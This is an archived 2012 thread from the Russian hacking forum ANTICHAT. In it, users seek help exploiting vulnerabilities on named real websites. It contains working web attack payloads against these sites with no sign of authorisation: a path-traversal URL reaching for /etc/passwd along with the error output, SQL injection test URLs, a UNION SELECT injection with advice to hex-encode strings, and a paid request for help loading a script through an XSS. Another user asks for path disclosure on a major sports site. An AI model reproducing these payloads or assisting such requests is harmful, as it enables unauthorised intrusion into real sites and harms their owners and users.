ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.12.2012, 19:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
http://www.ctege.info/index.php?option=1 как раскрутить?
|
|
|
|
24.12.2012, 21:34
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
Сообщение от Vip77
Vip77 said:
http://www.ctege.info/index.php?option=1 как раскрутить?
Как минимум есть раскрытие путей. Несколько раз повводил отбалдовые запросы и получил вот это:
http://www.ctege.info/index.php?option=../../../../.../.../etc/passwd
Сообщение от None
FILE NOT FOUND: etcpasswd/7.html
URI:/etcpasswd/7.html
Fatal error: Using $this when not in object context in /var/www/user/data/www/ctege.org/includes/database/dbcache.php on line 206
|
|
|
24.12.2012, 21:57
|
|
Познающий
Регистрация: 26.11.2008
Сообщений: 40
Провел на форуме:
1410006
Репутация:
4
|
|
Сообщение от OxoTnik
OxoTnik said:
Гугли обход фильтраций XSS
Зачем мне это гуглить, xss есть, мне просто нужно чтобы скрипт свой можно было подгрузить. В общем кто знает как это сделать стукните в личку даю 500р
|
|
|
|
25.12.2012, 01:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Сообщение от herfleisch
herfleisch said:
Как минимум есть раскрытие путей. Несколько раз повводил отбалдовые запросы и получил вот это:
http://www.ctege.info/index.php?option=../../../../.../.../etc/passwd
sqli там тоже есть
|
|
|
|
25.12.2012, 04:57
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
Провел на форуме:
7301
Репутация:
0
|
|
Как раскрутить это?
Код:
Code:
_ttp://www.howtotrade.ru/phorum/topusers.php?11,num=50%27
|
|
|
|
25.12.2012, 08:18
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от qwwertty
qwwertty said:
Как раскрутить это?
Код:
Code:
_ttp://www.howtotrade.ru/phorum/topusers.php?11,num=50%27
Код:
Code:
select user_id, username, posts from phorum_users where posts > 0 order by posts DESC LIMIT 0,[INJECT]
Инъекция в LIMIT при использовании конструкции ORDER BY.
Вывод - никак не раскрутишь.
|
|
|
|
25.12.2012, 11:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
109228
Репутация:
124
|
|
Как в таком запросе: http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20-- вместо version() вывести произвольную строку? Заранее благодарен.
|
|
|
|
25.12.2012, 13:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от FunOfGun
FunOfGun said:
Как в таком запросе:
http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20--
вместо version() вывести произвольную строку? Заранее благодарен.
шифруешь строку в хекс и вставляешь
|
|
|
|
25.12.2012, 14:03
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
Сообщение от Vip77
Vip77 said:
sqli там тоже есть
SQLi там есть, но раскрутить ее у меня не получилось, ибо строка запроса тупо попадает в условие запроса. Кто-то более опытный, может быть, сможет что-то выжать.
|
|
|
|
26.12.2012, 16:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Люди, помогите плиз найти раскрытие путей сайта http://www.sport.ru/
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
